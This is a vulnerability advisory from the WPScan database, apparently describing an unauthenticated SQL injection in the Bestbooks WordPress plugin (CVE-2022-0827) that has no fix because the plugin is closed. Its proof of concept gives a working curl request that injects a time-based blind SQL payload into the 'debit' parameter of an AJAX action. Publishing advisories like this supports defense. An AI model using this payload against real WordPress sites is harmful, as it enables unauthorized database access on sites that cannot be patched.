WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Bestbooks <= 2.6.3 - Unauthenticated SQLi

Description

The plugin does not sanitise and escape some parameters before using them in a SQL statement via an AJAX action, leading to an SQL Injection exploitable by unauthenticated users

Proof of Concept

Affected parameters: credit and debit

curl https://example.com/wp-admin/admin-ajax.php \
    --data 'action=bestbooks_add_transaction&type=x&account=x&date=x&description=3&debit=(CASE WHEN (9277=9277) THEN SLEEP(5) ELSE 9277 END)&credit=1'

Affects Plugins

bestbooks
No known fix - plugin closed

References

CVE
CVE-2022-0827

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website
https://cyllective.com/
Submitter twitter
cyllective
Verified

Yes

WPVDB ID
0d208ebc-7805-457b-aa5f-ffd5adb2f3be

Timeline

Publicly Published

2022-05-17 (about 1 months ago)

Added

2022-05-17 (about 1 months ago)

Last Updated

2022-05-18 (about 1 months ago)

Our Other Services

WPScan WordPress Security Plugin